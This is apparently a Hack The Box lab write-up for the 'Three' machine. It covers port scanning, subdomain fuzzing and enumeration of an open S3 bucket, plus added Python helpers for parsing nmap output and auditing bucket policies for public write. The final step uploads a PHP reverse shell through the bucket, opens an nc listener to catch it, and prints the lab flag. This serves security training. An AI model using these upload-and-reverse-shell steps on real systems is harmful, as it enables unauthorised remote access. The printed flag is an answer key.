[HTB - Starting Point] Three
Task 1
Q : How many TCP ports are open?
[host] # nmap -sVC -p- --open <target_ip> -oA Three_full_scan
A : 2
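As an added example (not part of the original writeup), a small Python parser for the greppable `.gnmap` file that `-oA Three_full_scan` writes, so the open-port count can be pulled out of the scan output instead of read by eye. The sample output embedded below is constructed; its ports and banners are placeholders, not the box's real scan results.

```python
"""Count open TCP ports from nmap greppable output (the .gnmap file written by -oA)."""
import re
from typing import Dict, List, NamedTuple, Optional


class PortRecord(NamedTuple):
    port: int
    state: str
    proto: str
    service: str
    version: str


# Constructed sample .gnmap content (not the box's real results): one host,
# two open TCP services plus one filtered port so the state filter has work to do.
SAMPLE_GNMAP = (
    "# Nmap 7.93 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sVC -p- -oA Three_full_scan 10.0.0.5\n"
    "Host: 10.0.0.5 ()\tStatus: Up\n"
    "Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu/, "
    "80/open/tcp//http//Apache httpd 2.4.29/, 111/filtered/tcp//rpcbind///"
    "\tIgnored State: closed (65532)\n"
    "# Nmap done at Mon Jan  1 00:01:00 2024 -- 1 IP address (1 host up) scanned in 60.00 seconds\n"
)

# Port entries are comma separated, but a version banner may itself contain a
# comma, so only split on a comma that is followed by the next "port/" token.
ENTRY_SPLIT = re.compile(r",\s+(?=\d+/)")


def parse_gnmap(text: str) -> Dict[str, List[PortRecord]]:
    """Return {host_ip: [PortRecord, ...]} for every 'Host: ... Ports:' line."""
    results: Dict[str, List[PortRecord]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts:" not in line:
            continue  # comments, "Status: Up" lines, and the trailer are skipped
        host = line.split()[1]
        # Everything between "Ports:" and the next tab-separated field.
        ports_part = line.split("\tPorts:", 1)[1].split("\t", 1)[0].strip()
        records = results.setdefault(host, [])
        for entry in ENTRY_SPLIT.split(ports_part):
            entry = entry.strip()
            if entry.endswith("/"):
                entry = entry[:-1]
            # gnmap port entries carry 7 slash-separated fields:
            # port/state/protocol/owner/service/rpc_info/version
            fields = entry.split("/", 6)
            if len(fields) != 7:
                continue  # malformed entry: skip it rather than abort the whole parse
            port, state, proto, _owner, service, _rpc, version = fields
            records.append(PortRecord(int(port), state, proto, service, version))
    return results


def open_tcp_ports(text: str, host: Optional[str] = None) -> List[int]:
    """Sorted list of ports reported as open/tcp, for one host or for all hosts."""
    parsed = parse_gnmap(text)
    hosts = [host] if host else list(parsed)
    ports = {
        r.port
        for h in hosts
        for r in parsed.get(h, [])
        if r.proto == "tcp" and r.state == "open"
    }
    return sorted(ports)


def count_open_tcp(text: str, host: Optional[str] = None) -> int:
    """The number Task 1 asks for: how many TCP ports are open."""
    return len(open_tcp_ports(text, host))


if __name__ == "__main__":
    for ip, records in parse_gnmap(SAMPLE_GNMAP).items():
        print(ip)
        for r in records:
            print(f"  {r.port}/{r.proto} {r.state:<8} {r.service:<8} {r.version}")
    print("open TCP ports:", count_open_tcp(SAMPLE_GNMAP))
```

Point the script at a real file with `count_open_tcp(open("Three_full_scan.gnmap").read())`; because the scan on the page uses `--open`, a real file will normally contain only open entries and the state filter is there for scans run without that flag.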
Task 2
Q : What is the domain of the email address provided in the “Contact” section of the website?
A : thetoppers.htb
Task 3
Q : In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
A : /etc/hosts
Task 4
Q : Which sub-domain is discovered during further enumeration?
[host] # echo "<target_ip> thetoppers.htb" >> /etc/hosts
[host] # tgt_size=$(curl -s http://thetoppers.htb | wc -c)
[host] # ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -fs $tgt_size -mc all
A : s3.thetoppers.htb
Task 5
Q : Which service is running on the discovered sub-domain?
A : amazon s3
Task 6
Q : Which command line utility can be used to interact with the service running on the discovered sub-domain?
A : awscli
Task 7
Q : Which command is used to set up the AWS CLI installation?
A : aws configure
Task 8
Q : What is the command used by the above utility to list all of the S3 buckets?
A : aws s3 ls
Task 9
Q : This server is configured to run files written in what web scripting language?
[host] # aws --endpoint-url=http://s3.thetoppers.htb s3 ls
[host] # aws --endpoint-url=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
A : php
SUBMIT FLAG
Q : Submit root flag
Get a PHP reverse shell script and set its listener address and port to match the nc listener below.
[host] # aws --endpoint-url=http://s3.thetoppers.htb s3 cp php-reverse-shell.php s3://thetoppers.htb
[host] # nc -nvlp <listen_port_in_php_reverse_shell>
Browse to http://<target_ip>/php-reverse-shell.php to trigger the reverse shell.
(reverse-shell) $ find / -name flag.txt 2>/dev/null
(reverse-shell) $ cat /var/www/flag.txt
A : a980d99281a28d638ac68b9bf9453c2b
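The upload in the final step works only because the bucket behind s3.thetoppers.htb accepts object writes from an unauthenticated caller, and the web server then executes PHP from that bucket-backed document root. As an added defender-side example (not part of the original writeup, and not an API the box exposes), the Python below audits a bucket policy and a bucket ACL for grants that let everyone write, and shows a hardened policy that keeps public read for the static site but limits writes to a named deployer role. All policy and ACL documents, the account ID and the role name are constructed placeholders.

```python
"""Flag S3 bucket policies and ACLs that let anyone write (upload) into a bucket."""
import fnmatch
from typing import Any, Dict, List

# Predefined grantee groups that mean "everyone" (AuthenticatedUsers is any AWS
# account, which is effectively public too).
EVERYONE_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
ACL_WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}
# IAM actions that let a caller create, replace or remove objects.
WRITE_ACTIONS = {"s3:PutObject", "s3:PutObjectAcl", "s3:DeleteObject", "s3:ReplicateObject"}

# Constructed sample documents (placeholders, not taken from the box).
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicUpload", "Effect": "Allow", "Principal": "*",
        "Action": ["s3:GetObject", "s3:PutObject"],
        "Resource": "arn:aws:s3:::thetoppers.htb/*",
    }],
}
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thetoppers.htb/*"},
        {"Sid": "DeployerWrite", "Effect": "Allow",
         # placeholder account id and role name
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/site-deployer"},
         "Action": ["s3:PutObject", "s3:DeleteObject"],
         "Resource": "arn:aws:s3:::thetoppers.htb/*"},
    ],
}
WEAK_ACL = {"Grants": [{"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
                        "Permission": "WRITE"}]}
HARDENED_ACL = {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id-placeholder"},
                            "Permission": "FULL_CONTROL"}]}


def _as_list(value: Any) -> List[Any]:
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_everyone(principal: Any) -> bool:
    # Both the bare "*" and {"AWS": "*"} forms mean anonymous access.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(p == "*" for p in _as_list(principal.get("AWS")))
    return False


def _grants_write(actions: Any) -> bool:
    # IAM action matching is case-insensitive and allows '*' and '?' wildcards,
    # so "s3:*", "*" and "s3:Put*" all cover PutObject.
    for pattern in _as_list(actions):
        if any(fnmatch.fnmatchcase(a.lower(), str(pattern).lower()) for a in WRITE_ACTIONS):
            return True
    return False


def public_write_statements(policy: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Allow statements that give a write action to everyone.

    A Deny elsewhere in the policy could still block these, so treat each hit
    as a finding to review, and look at any Condition before dismissing it."""
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_everyone(stmt.get("Principal")):
            continue
        if not _grants_write(stmt.get("Action")):
            continue
        findings.append({"Sid": stmt.get("Sid", ""),
                         "Resource": _as_list(stmt.get("Resource")),
                         "Conditional": "Condition" in stmt})
    return findings


def public_write_grants(acl: Dict[str, Any]) -> List[str]:
    """ACL grants of WRITE/WRITE_ACP/FULL_CONTROL to the AllUsers or AuthenticatedUsers groups."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if (grantee.get("Type") == "Group" and grantee.get("URI") in EVERYONE_GROUPS
                and grant.get("Permission") in ACL_WRITE_PERMISSIONS):
            hits.append(f"{grantee['URI'].rsplit('/', 1)[-1]}:{grant['Permission']}")
    return hits


if __name__ == "__main__":
    for name, pol in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(f"{name} policy public-write statements:", public_write_statements(pol))
    for name, acl in (("weak", WEAK_ACL), ("hardened", HARDENED_ACL)):
        print(f"{name} ACL public-write grants:", public_write_grants(acl))
```

On a real account the two documents come from `aws s3api get-bucket-policy` and `aws s3api get-bucket-acl`; the second half of the fix is on the web server, which should not execute scripts out of a directory that is synchronised from a bucket anyone can write to.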